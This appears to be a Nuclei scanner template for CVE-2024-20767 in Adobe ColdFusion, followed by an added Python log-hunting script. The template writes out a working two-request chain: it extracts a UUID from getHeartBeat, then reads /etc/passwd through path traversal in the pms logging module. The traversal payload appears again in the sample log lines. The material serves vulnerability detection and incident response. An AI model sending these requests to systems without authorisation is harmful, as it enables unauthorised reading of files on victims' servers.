
Adobe ColdFusion - Arbitrary File Read

ID: CVE-2024-20767

Severity: high

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve,cve2024,adobe,coldfusion,lfr,kev

ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.

id: CVE-2024-20767
info:
  name: Adobe ColdFusion - Arbitrary File Read
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.
  reference:
    - https://jeva.cc/2973.html
    - https://nvd.nist.gov/vuln/detail/CVE-2024-20767
    - https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html
    - https://github.com/Praison001/CVE-2024-20767-Adobe-ColdFusion
    - https://github.com/Hatcat123/my_stars
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
    cvss-score: 8.2
    cve-id: CVE-2024-20767
    cwe-id: CWE-284
    epss-score: 0.08221
    epss-percentile: 0.94345
    cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.component:"Adobe ColdFusion"
    product: coldfusion
    vendor: adobe
  tags: cve,cve2024,adobe,coldfusion,lfr,kev
http:
  - raw:
      - |
        GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /hax/../pms?module=logging&file_name=../../../../../../../../../../../../../../../../../../etc/passwd&number_of_lines=1000 HTTP/1.1
        Host: {{Hostname}}
        uuid: {{extracted_uuid}}
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "contains(body_1, 'wddxPacket')"
          - "contains(header_2, 'application/json')"
          - "contains(body_2, '/bin/bash')"
        condition: and
    extractors:
      - type: regex
        part: body_1
        name: extracted_uuid
        group: 1
        regex:
          - "<var name='uuid'><string>(.*)</string>"
        internal: true
# digest: 4a0a00473045022100d2d1ed47cf7224bcd242719e9f794ea0dacffeab31038cdada43f9c19c623e7e022018414090737358b9e99590d6def16a8517b94cf74b32063b966ae79e99583d84:922c64590222798bb761d5b6d8e72950

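This template detects CVE-2024-20767 on Adobe ColdFusion hosts. It sends two requests: the first extracts a UUID from the getHeartBeat response, and the second presents that UUID in a uuid header while requesting /etc/passwd through the pms logging module. A target is reported only when all three matchers succeed. Run it with the Nuclei tool: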

$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-20767.yaml"
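
For the response side, the two request shapes the template sends can also be hunted in web access logs. The script below is an added example, not part of the original template or the Nuclei project; it assumes combined-format access logs, and the sample lines, labels and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [01/Apr/2024:10:00:01 +0000] "GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1" 200 512
198.51.100.7 - - [01/Apr/2024:10:00:02 +0000] "GET /hax/../pms?module=logging&file_name=../../../../etc/passwd&number_of_lines=1000 HTTP/1.1" 200 2048
203.0.113.9 - - [01/Apr/2024:10:05:00 +0000] "GET /index.cfm?page=home HTTP/1.1" 200 1024
203.0.113.20 - - [01/Apr/2024:10:06:00 +0000] "GET /x/%2e%2e/pms?module=logging&file_name=..%2F..%2Fetc%2Fpasswd&number_of_lines=5 HTTP/1.1" 404 0
"""

# client IP, method, request target, status (assumed combined log format)
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify(target):
    """Label a request target that matches either step of the template."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()   # decode %2e%2e and similar
    query = parse_qs(parts.query)        # values are percent-decoded
    methods = [m.lower() for m in query.get("method", [])]
    modules = [m.lower() for m in query.get("module", [])]
    if path.endswith("servermanager.cfc") and "getheartbeat" in methods:
        return "heartbeat-uuid-probe"
    if path.rstrip("/").endswith("/pms") and "logging" in modules:
        if any(".." in name for name in query.get("file_name", [])):
            return "pms-traversal-read"
    return None

def scan(log_text):
    """Return (findings, chained): labelled hits, and IPs that did both steps in order."""
    findings, seen_heartbeat, chained = [], set(), set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, _method, target, status = m.groups()
        label = classify(target)
        if label == "heartbeat-uuid-probe":
            seen_heartbeat.add(ip)
        elif label == "pms-traversal-read" and ip in seen_heartbeat:
            chained.add(ip)   # UUID fetch followed by a file read attempt
        if label:
            findings.append((ip, label, int(status)))
    return findings, chained

if __name__ == "__main__":
    hits, chained_ips = scan(SAMPLE_LOG)
    print(hits, chained_ips)
```

A heartbeat request on its own may be legitimate administrative traffic; the chained set and a 200 status on the pms request are the stronger signals to triage first.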
